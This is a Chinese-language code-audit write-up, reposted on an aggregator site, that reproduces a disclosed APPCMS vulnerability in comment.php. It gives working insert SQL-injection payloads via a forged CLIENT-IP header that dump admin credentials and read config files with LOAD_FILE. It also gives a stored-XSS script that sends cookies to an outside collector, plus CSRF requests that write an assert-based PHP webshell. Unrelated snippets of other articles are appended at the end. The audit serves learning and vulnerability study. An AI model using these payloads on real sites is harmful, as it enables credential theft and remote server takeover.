php %3c%3c%3cxml 报错,代码审计| APPCMS SQL-XSS-CSRF-SHELL

0x01 背景

由若水师傅提供的一个素材,想要复现CNVD上披露的一个APPCMS的漏洞,由CNVD上的描述可以知道存在漏洞的地方是comment.php这个文件,然后就没有详细的漏洞信息了,所以就需要分析相应的源码文件找出存在漏洞的点。借这个素材捡起下代码审计的各种感觉。期待一起学习,期待和师傅们各种交流讨论。

官方站点:http://www.appcms.cc/

漏洞详情地址:

http://www.cnvd.org.cn/flaw/show/CNVD-2017-13891

0x02 审计过程

1. Thinking的心历路程

本篇是个事后总结,是在审计过程中逐步思考利用,然后达到预期的目的。

先是进行了代码审计清楚了造成的漏洞的位置,开始先获得了用户名是admini,密文密码:77e2edcc9b40441200e31dc57dbb8829,安全码:123456;但是并无法得到后台地址,经过思考分析,便想到利用2次漏洞进行XSS打到后台地址和cookie,在深入些便是和CSRF结合得到shell,这便是我的心历路程。以下先说说代码审计部分。

(1)寻找漏洞位置

打开comment.php文件,通读comment.php文件中的代码,并跟踪数据的传递过程。CNVD上说的是一个SQL注入漏洞,所以可以先关注comment.php文件中涉及SQL操作的代码。

comment.php文件第80行-86行,目测query_update,single_insert存在SQL操作,进行SQL拼接的是TB_PREFIX,$fields['parent_id']和$fields。1.//comment.php文件第80行-86行

2.    if ($fields['parent_id'] != 0) {

3.        $ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = '{$fields['parent_id']}'");

4.    }

5.    $res = $dbm -> single_insert(TB_PREFIX . 'comment', $fields);

其中TB_PREFIX在\core\config.conn.php进行了define('TB_PREFIX', 'appcms_');定义,所以不用管TB_PREFIX。

$fields['parent_id']在第73行$fields['parent_id'] = $page['post']['parent_id'];if(!is_numeric($fields['parent_id'])) die();进行了数据类型的判断,所以也不能利用。

$fields是由自定义方法function m__add()创建的一个数组,再将$page数组中关键的信息赋给$fields,而$page拥有所有POST和GET的数据;

在 m__add()自定义方法中可控的数据$fields['id'],$fields['type'],$fields['parent_id']必须是数字类型,所以无法利用,剩下$fields['uname'] ,$fields['content'],$fields['ip'],后面经过测试和数据跟踪的过程$fields['ip']是一个可控制并可注入的点。1.//comment.php文件第29-30行

2.$page['get'] = $_GET; //get参数的 m 和 ajax 参数是默认占用的,一个用来执行动作函数,一个用来判断是否启用模板还是直接输出JSON格式数据

3.$page['post'] = $_POST;

1.//comment.php文件第57-86行

2.function m__add() {

3.    global $page, $dbm, $c;

4.

5.    $fields = array();

6.    foreach($page['post'] as $key => $val) {

7.        $page['post'][$key] = htmlspecialchars(helper :: escape($val));

8.    }

9.    if (empty($page['post']['comment'])) {

10.        die('{"code":"1","msg":"发表内容不能为空"}');

11.    }

12.    $code = md5(strtoupper($page['post']['code']));

13.    if ($code != $_SESSION['feedback']) {

14.        die('{"code":"140","msg":"验证码错误"}');

15.    }

16.    $fields['id'] = $page['post']['id'];if(!is_numeric($fields['id'])) die();

17.    $fields['type'] = $page['post']['type'];if(!is_numeric($fields['type'])) die();

18.    $fields['parent_id'] = $page['post']['parent_id'];if(!is_numeric($fields['parent_id'])) die();

19.    $content = $c -> filter_words($page['post']['comment']);

20.    $fields['content'] = helper :: utf8_substr($content, 0, 300);

21.    $user = $c -> filter_words($page['post']['user'], 'user');

22.    $fields['uname'] = helper :: utf8_substr($user, 0, 10);

23.    $fields['date_add'] = time();

24.    $fields['ip'] = helper :: getip();

25.    if ($fields['parent_id'] != 0) {

26.        $ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = '{$fields['parent_id']}'");

27.    }

28.    $res = $dbm -> single_insert(TB_PREFIX . 'comment', $fields);

29.    if (empty($res['error']) && empty($ress['error'])) die('{"code":"0","msg":"恭喜发表成功"}');

30.    die('{"code":"1","msg":"发表失败:' . $ress['error'] . '"}');

31.}

之所以得到如上的结论,第一个,是在跟进single_insert方法的时候,在改方法中将$fields数组中的值使用foreach进行组合后传入$sql中没有经过任何处理。1.//core/database.class.php第102-120行代码块

2. public function single_insert($table_name, $fields) {

3.        if (!is_array($fields) || count($fields) == 0) return array('sql' => '', 'error' => '插入失败,插入字段为空', 'sql_time' => 0, 'autoid' => 0);

4.

5.        $sql_field = "";

6.        $sql_value = "";

7.        // 遍历字段和值

8.        foreach($fields as $key => $value) {

9.            $sql_field .= ",$key";

10.            $sql_value .= ",'$value'";

11.        }

第二个,跟进$fields['ip'] = helper :: getip();的getip()方法,发现获取的方式中有一项是CLIENT-IP,这种方式可以通过客户端进行IP伪造。1.//core/help.class.php文件的第47-57行

2. public static function getip() {

3.        $onlineip = '';

4.        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {

5.            $onlineip = getenv('HTTP_CLIENT_IP');

6.        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {

7.            $onlineip = getenv('REMOTE_ADDR');

8.        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {

9.            $onlineip = $_SERVER['REMOTE_ADDR'];

10.        }

11.        return $onlineip;

12.    }

因此$fields['ip']的值满足用户可控且数据未经过安全处理直接拼接传入SQL语句,造成了insert注入。为了方便查看和构造payload,我在/core/database.class.php文件的single_insert方法的117行加入echo $sql;方便查看SQL语句,又由于这个CMS的存在失效的图片验证,所以可以轻松的使用burpSuite进行注入获取数据。

80a9ed7609e930491fe3be04c5fab5f2.png

(2)构造payload获取用户名密码

接下来构造PAYLOAD,这个位置是insert注入但是并不会报SQL的错误,所以无法使用报错注入,在师傅们的指导提醒下发现可以直接使用insert将注入查询到的结果回显到前台中,由于这个是个评论功能,那么展示的位置是content,uname,date_add,ip这4个位置。

f6086eeb93e7002ad4c5c8ea50a3a5a6.png

可以直接使用如下的语句将查询结果插入到content和uname,然后回显到前台的用户名和回复内容位置。

PAYLOAD:

CLIENT-IP:10.10.10.1'),('1','0','0',(select upass from appcms_admin_list where uid= '1'),(select uname from appcms_admin_list where uid= '1'),'1510908798',1)#

61c8116c58ccc98796f11718adb19b13.png

e67b63fe541c7ac088c36415f3b09594.png

(3)构造payload获取安全码

此时就获得到站点的用户名和密码,接下来要获取安全码,这里使用mysql的load_file()来读取\core\config.php文件,安全码等敏感信息就在该文件里面。

可以使用去掉payload后面的#导致报错等方式得到网站的绝对路径,因为在\core\init.php中默认开启了错误提示,所以可以利用错误信息得到绝对路径。

8a6fcac027e792177d4a91ea59903ed0.png

得到绝对路径便可以使用load_file()去读取\core\config.php文件中的安全码了,但是这里content列是使用varchar,然后长度是500,所以直接使用load_file()是无法获得安全码的,因此使用了substr进行了截断,截断范围大致是 从480开始 然后截断400个字符长度,此处没有进行了预测没有精准计算,但是已经将安全码写到content列中了。

PAYLOAD:

CLIENT-IP:10.10.10.1'),('1','0','0',(SUBSTR(LOAD_FILE('D:\\soft\\phpStudy\\WWW\\APPCMS\\core\\config.php'), 480 , 400)),'thinking','1510908798',123456)#

d126162ccfea8b72f6b8d7a200f9845e.png

d0f81e5c10b6ff1884163fbe86735b5e.png

此时已经得到用户名是admini,密文密码:77e2edcc9b40441200e31dc57dbb8829,安全码:123456;但是APPCMS安装完毕后强制更改后台地址,所以就是拿到这3个敏感信息也难以登录后进行其他操作。

2. Thinking的心历路程

以上通过代码审计已经分析了CNVD上该版本的APPCMS漏洞产生的整个过程,接下来是对这个漏洞进行进阶研究和学习。所先这种insert注入将用户可控的数据直接写到数据库中,极大的可能还会造成2次漏洞,本小节利用insert注入直接进行存储型XSS打后台,且使用CSRF在添加模块的地方进行写马操作。

(1)XSS注入测试

常规测试 忽略 :!)

(2)打COOKIE平台

这里我使用的蓝莲花团队的xss平台。

09ef3ccb3f585a02d34a64dffa7aab2d.png

PAYLOAD构造:

这里我对内容进行的修改添加了两个请求,一个是创建文件的请求,一个是为文件添加内容的请求。1.//获取站点的关键信息

2.var website="http://127.0.0.1/xsser";

3.(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

4.

5.function csrf_shell()

6.{

7.//创建文件名为evil.php的文件

8.var xmlhttp1=new XMLHttpRequest();

9.xmlhttp1.open("POST","./template.php?m=create_file",true);

10.xmlhttp1.setRequestHeader("Content-type","application/x-www-form-urlencoded");

11.xmlhttp1.send("filename=evil.php");

12.

13.//在evil.php文件中写入一句话

14.var xmlhttp2=new XMLHttpRequest();

15.xmlhttp2.open("POST","./template.php?m=save_edit",true);

16.xmlhttp2.setRequestHeader("Content-type","application/x-www-form-urlencoded");

17.xmlhttp2.send("filename=evil.php&content=%3C%3Fphp+assert%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E");

18.};

19.csrf_shell();

(3)测试是否利用成功

配置好后进行如下请求,此时后台会生成一条评论记录。

a1e226941c03c671371f1b2256a7e60b.png

模拟管理员登录后台,使用burpload进行跟踪,发现创建了evil.php文件,并为文件写入一句话,证明成功执行了刚才配置好的脚本,然后还将站点的信息包括登录信息等也发给了目标系统。

ad865ac462ba39f527af100d7789e099.png

f362ba63e5f935e96e85bddba44692b4.png

de46378ab79a76341cd6991d8dfefccb.png

此时便收到打回来的COOKIE信息了,而对对应的shell地址便是http://127.0.0.1/APPCMS/templates/default/evil.php

0x03 小小总结

本篇获取后台的方法我就想到了XSS,本想使用报错的方式,但发现前台并无数据和后台进行交互,所以没想到怎么在前台引发报错,报出后台地址,所以就采用SQL注入,XSS,CSRF直接getShell了。如果师傅们有更好的思路期待讨论交流,感谢若水师傅提供的素材,感谢各位师傅的指导。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/533335.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

php二进制保存到本地,C# 将二进制字符串保存到本地

C# 将二进制字符串保存到本地#region 将文件保存到本地/// /// 将文件保存到本地/// /// 文件的二进制数据字符串/// 文件名称,必须带后缀private void SaveFile(string psContent, string psFileName){byte[] accessory Convert.FromBase64String(psContent);//Sy…

suse 安装oracle11,Suse11安装Oracle11gR2

注:以下采用终端XmanagerEnterprise 4中的Xshell连接1、安装前参数修改vi /etc/security/limits.conf --末尾添加如下oracle soft nproc 2047oracle hard nproc 16384oracle soft nofile 1024oracle hard nofile 65536vi /etc/sysctl.conf --末尾添加如…

oracle安装缺少,安装oracle11g R2 缺少依赖包

最近我在RHEL6.1上安装oracle11gR2时总是碰见如题说示的错误,在网上查了很多资料但都未能解决。网上都说是gcc版本问题或者gcc的包没有装全,但没有给出正确的gcc安装方法。这里转载别人的安装gcc的rpm包的顺序及方法,供各位参考:转…

PHP7数字三角形代码,倒数字三角

摘要&#xff1a;描述 Description以下的数字倒直角三角形是由二个数确定的&#xff1a;一个数是行数R&#xff0c;1<R<39&#xff0c;另一个是种子数S,1<S<9。S放在左上角&#xff0c;照着样例输出文件的样子&#xff0c;写一个程序&#xff0c;根据输入的二个数打…

oracle 超市管理系统,SuperManager 超市账单管理系统 JSP + Servlet + Oracle Jsp/ 240万源代码下载- www.pudn.com...

文件名称: SuperManager下载 收藏√ [5 4 3 2 1 ]开发工具: Java文件大小: 2144 KB上传时间: 2015-07-07下载次数: 0详细说明&#xff1a;超市账单管理系统JSP Servlet Oracle-超市账单管理系统JSP Servlet Oracle文件列表(点击判断是否您需要的文件&#xff0c;如果是…

oracle组合数据类型,oracle复合数据类型-相关方法

oracle提供了一些内置的函数和方法来操作复合数据类型。一、count 返回集合中的元素的个数declaretype ename_table_type is table of varchar2(20) index by binary_integer ;ename_table ename_table_type ;beginfor i in 1..5 loopename_table(i):a||i ;end loop ;dbms_outp…

hibernate native oracle,hibernate native 主键生成策略

前一次做个系统用的oracle数据库&#xff0c;使用hibernate生成主键的策略是SEQUENCE,当时觉得很累&#xff0c;因为不知道怎么的&#xff0c;oraclesequencetrigger怎么也取不到新增数据时的主键值。这次就把重点放这里了&#xff0c;同时还有两个新的问题&#xff0c;1。到底…

export Oracle_sid =asm,单实例下oracle数据库从文件系统迁移到ASM上

第一步&#xff1a;启动ASM实例(ASM)[oracleoracle ~]$ export ORACLE_SIDASM[oracleoracle ~]$ sqlplus / as sysdbaSQL*Plus: Release 10.2.0.5.0 - Production on Tue Jan 18 13:25:46 2011Copyright (c) 1982, 2010, Oracle. All Rights Reserved.Connected to:Oracle Dat…

linux命令行的操作符,如何在Linux命令行中进行基本的数学运算

原标题&#xff1a;如何在Linux命令行中进行基本的数学运算Linux bash或命令行允许您执行基本和复杂的算术和布尔运算。像expr&#xff0c;jot&#xff0c;bc和factor等命令可以帮助您找到复杂问题的最优数学解决方案。在本文中&#xff0c;我们将描述这些命令并提供示例&#…

在linux关闭的命令,关于关闭Linux计算机的命令操作

关于关闭Linux计算机的命令操作shutdown -h now 立即关机shutdown -r now 立即重启Linux命令&#xff1a;shutdown功能说明&#xff1a;系统关机指令。语法&#xff1a;shutdown [-efFhknr][-t 秒数][时间][警告信息]补充说明&#xff1a;shutdown指令可以关闭所有程序&#xf…

linux什么用户什么任务,linux任务里的1 和2是什么意思

输出学过代码的小伙伴应该知道STDIN、STDOUT、STDERR通常都是指定输出通道的&#xff0c;perl里又称之为句柄那么1代表的就是STDOUT、2代表的是STDERR、jimmy在视频中会翻译成1代表的是正确输出&#xff0c;2代表的是错误输出。其实严格上不能这样去固有化去理解每一个软件的定…

linux 命令 查询丢包率,linux测试丢包率的命令 linux查看丢包率命令

关于用ping命令测网络延迟和丢包率&#xff1f;在工作中&#xff0c;ping命令用于测试网络是否可以连接。其次是网络连接的稳定性&#xff0c;也就是所谓的丢包率。延时参数可手动设定&#xff0c;影响因素较多。输入windows dos并输入Ping/all以查看所有参数分析和单个示例。L…

linux http连接超时时间设置,Linux 下 HTTP连接超时

将项目部署到现场环境&#xff0c;HTTP请求莫名奇妙的连接超时&#xff0c;通过抓包定位了问题&#xff0c;是请求的IP被禁止掉。其中用到了抓包&#xff0c;将记录记录于此。tcpdump host 120.197.89.51 -i any -vvv::06.241085 IP (tos 0x0, ttl , id , offset , flags [DF],…

linux 库的头文件安装在,“找不到jpeg的头文件或库文件”在Alpine Linux上安装枕头...

我试图在基于python:alpine的Docker容器中运行Python的Scrapy。它以前是有效的&#xff0c;但现在我想使用Scrapy的Image Pipeline这需要我安装枕头。作为一个简单的例子&#xff0c;我尝试了以下Dockerfile&#xff1a;FROM python:alpineRUN apk --update add libxml2-dev li…

linux .desktop权限,如何在Ubuntu Xenial Xerus 16.04 Linux Desktop上以root用户身份登录

您可能已经注意到&#xff0c;默认情况下&#xff0c;Ubuntu Xenial Xerus 16.04 Linux Desktop不具备以root管理员用户身份登录的功能。每次尝试以root用户身份在终端上登录都会导致Login incorrect错误信息&#xff1a;。默认的Ubuntu Linux桌面行为的背后原因是&#xff0c;…

DBackup环境部署linux,linux_BackupPC 安装部署

yum installperl-Compress-Zlib perl-Archive-Zip perl-File-RsyncP perl-XML-RSShttpdyum-y install perl-suidperl mod_perlrpm -ivhbackuppc_community-3.2.0beta0-1.rhel5.noarch.rpm1- 上面安装会创建backuppc,apache用户。vi/etc/httpd/conf/httpd.conf修改‘User apache…

linux18配置静态ip,ubuntu18配置静态IP地址

xavier NX板子上安装的事ubuntu18, 简单记录一下ubuntu18如何配置静态IP地址。首先生成一下文件&#xff1a;sudo netplan generate运行这一句的时候如果提示netplan command not found&#xff0c;执行下面的命令sudo apt install netplan.io然后创建文件sudo vim /etc/netpla…

2048游戏c语言linux简易代码,C语言实现2048游戏代码

本文实例为大家分享了C语言实现2048游戏具体代码&#xff0c;供大家参考&#xff0c;具体内容如下效果图:使用文本界面的屏幕绘图库 ncurses.设计思路:在满足条件情况下消除方块允许在游戏主界面(16 宫格)中任意一格输出数据实现代码:#include #include #include #include #inc…

linux访问网站出现443,Linux访问网站一直出现超时

问题描述&#xff1a;开发java应用时&#xff0c;需要访问此网站&#xff0c;在windows上一切正常访问&#xff0c;部署到linux服务器上就出现了访问超时[rootVM_18_115_centos ~]# wget https://wap.zhengzhoubus.com/buswechat/WifiBusInterface/transfer/line!getLineAll.ac…

linux十大证书,验证Linux上的X.509证书

openssl verify会做你想要什么&#xff0c;如果你想有一个简单的工具&#xff1a;从运行&#xff1a;cd /usr/share/ca-certificatesfind . -type f -exec openssl -verify {} \;这里有一个选择的输出&#xff1a;./telesec.de/deutsche-telekom-root-ca-2.crt: OK./brasil.gov…